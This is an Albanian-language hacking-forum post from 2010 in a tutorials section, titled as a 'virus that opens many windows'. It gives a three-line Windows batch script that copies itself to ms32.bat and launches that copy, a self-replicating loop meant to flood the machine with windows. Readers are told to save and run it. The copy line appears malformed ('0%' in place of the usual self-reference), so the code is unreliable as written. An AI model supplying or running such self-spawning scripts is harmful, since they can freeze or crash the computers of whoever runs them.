Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...

Powered By:Valmir Shala
 
ForumForum  PortalPortal  CalendarCalendar  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimi  

Share | 
 

 Nje Virus qe te qel shum dritare :

Shko poshtë 
AutoriMesazh
noah~hack
Admin
noah~hack

Numri i postimeve : 275
Join date : 24/01/2010
Age : 25

MesazhTitulli: Nje Virus qe te qel shum dritare :   Wed Jan 27, 2010 8:01 pm

E hapim Notepadin shkruani ket kod

@echo off
copy 0% ms32.bat
start ms32.bat

Dhe e ruani me .Bat psh : erolli.bat dhe nese doni e hapni filen edhe e provoni
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.v-shala.tk
 
Nje Virus qe te qel shum dritare :
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Huh...Virus
» ATTN ALL: DO NOT USE DDO WIKI ATM!!
» Uninstall Pando Media Booster - possible virus
» New York Toy Fair 2012
» Recent Hauls

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...  :: Tutoriale&Mesime :: Tutoriale&Mesime-
Kërce tek: